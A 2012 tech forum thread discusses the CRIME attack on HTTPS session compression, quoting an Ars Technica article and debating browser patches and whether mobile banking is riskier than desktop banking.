• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

Computer hack allows HTTPS session hijacking

M

MplsBob

Senior member
The ARS Technica site has an article about a successful hacking of the Hypertext Transfer Protocol Secure (HTTPS).

HTTPS protects us when we want secure Internet communication during online banking, when we use our credit card, etc.

The hack has been named CRIME. CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter. Microsoft's Internet Explorer, Google's Chrome and Mozilla's Firefox browsers are all believed to be immune to the attack.

Question: Are there any steps we can take to reduce our vulnerability to this?
 
Not sure really, probably not much besides perhaps using opera for secure sites. I'm pretty sure everyone is working on a fix that will be out asap.
 
Is there maybe a typo in there? You state IE, Chrome, and Firefox are thought to be immune, then want to know what can be done to mitigate the risk. So if you're an Opera or Safari user, you'd just switch to one of the supposed immune browsers.
 
Yes, i think it was a typo. I read that all of those browsers are susceptible to this attack so I guess opera is not.
 
Quote from - http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

"CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter. Microsoft's Internet Explorer, Google's Chrome and Mozilla's Firefox browsers are all believed to be immune to the attack, but at time of writing smartphone browsers and a myriad of other applications that rely on TLS are believed to remain vulnerable".

End of Quote.

As you see, the main problem is Smart phone apps.

IMHO anyone who do Banking and other type of must be secure connection from his/her Smart Phone has to use to same phone to call ASAP a Psychiatrist and get a Mental Exam.

If one does not get it, there is a reason why Gov. and other agencies are using special Blackberries and Not your Telco. regular edition phones.



😎
 
Last edited:
JackMDS said:
Quote from - http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

"CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter. Microsoft's Internet Explorer, Google's Chrome and Mozilla's Firefox browsers are all believed to be immune to the attack, but at time of writing smartphone browsers and a myriad of other applications that rely on TLS are believed to remain vulnerable".

End of Quote.

As you see, the main problem is Smart phone apps.

IMHO anyone who do Banking and other type of must be secure connection from his/her Smart Phone has to use to same phone to call ASAP a Psychiatrist and get a Mental Exam.

If one does not get it, there is a reason why Gov. and other agencies are using special Blackberries and Not your Telco. regular edition phones.

😎
Click to expand...

You omitted an important part:

Both Chrome and Firefox were susceptible until recently. Google and Mozilla released patches after the weaknesses were privately reported by Juliano Rizzo (@julianor) and Thai Duong, the researchers who devised the CRIME exploits. Internet Explorer was never vulnerable because it never supported SPDY (pronounced "speedy") or the TLS compression scheme known as Deflate.
Click to expand...

As you can see, from a security perspective there is no real differentiation between mobile apps and desktop apps. Doing banking and other secure transactions on your phone is just as secure as doing them on a PC.

Blackberries are more secure because they're less functional, just like IE in this case.
 
I am aware of it, security patches is part of our life.

However, what matter is the end result, the Desktop/Laptop Browsers can be patched the Mobile stay risky.

Functional or Not, it is secondary to the risk taken while using Mobiles for Banking and CC activities.


😎
 
Last edited:
JackMDS said:
I am aware of it, security patches is part of our life.

However, what matter is the end result, the Desktop/Laptop Browsers can be patched the Mobile stay risky.

Functional or Not, it is secondary to the risk taken while using Mobiles for Banking and CC activities.


😎
Click to expand...

No, the mobile apps can be patched just as easily as well. I get updates for my mobile apps every day. A mobile computer is still a computer, the distinction you're drawing is unwarranted. Internet banking is equally risky regardless of the platform. Actually, in theory it's less risky because mobile environments are more controlled and thus have less under-vetted code in them.
 
You must log in or register to reply here.

TRENDING THREADS

Back
Top